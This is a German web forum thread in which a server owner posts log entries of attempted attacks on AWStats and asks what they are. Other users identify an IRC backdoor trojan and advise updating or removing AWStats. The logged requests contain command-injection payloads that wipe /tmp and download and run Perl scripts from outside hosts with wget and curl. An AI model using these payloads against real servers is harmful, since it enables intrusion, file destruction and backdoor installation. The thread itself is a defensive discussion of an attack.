ich habe in den Logs ein paar Einträge gefunden, die ich nicht einordnen kann. Ständig werden meine Ordner /cgi-bin und /stats abgefragt:

203.114.64.241 - ... GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

195.70.36.30 - - ... GET /awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/ircrider/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

auf der Seite http://80.53.220.138/.it/icet ist ein Script zu finden.
Kann mir jemand sagen was das für Adressen sind?

5039347Dd01 is infected with IRC.Backdoor.Trojan. It could not be repaired but has been quarantined

hm... :/

5039347Dd01 is infected with IRC.Backdoor.Trojan.

wo hast du das her? Ich kann mir aber nicht vorstellen daß mein Server infiziert ist.

Es wird versucht, Sicherheitslücken in AWStats auszunutzen.

Überprüf, ob du Version 6.4 hast. Falls nicht, solltest du AWStats lieber entfernen.

Mehr findest du sicherlich bei http://www.securityfocus.com

5039347Dd01 is infected with IRC.Backdoor.Trojan.

wo hast du das her? Ich kann mir aber nicht vorstellen daß mein Server infiziert ist.
von der seite.. kam eine norton warnung..
ist mac auch gefärdet? :D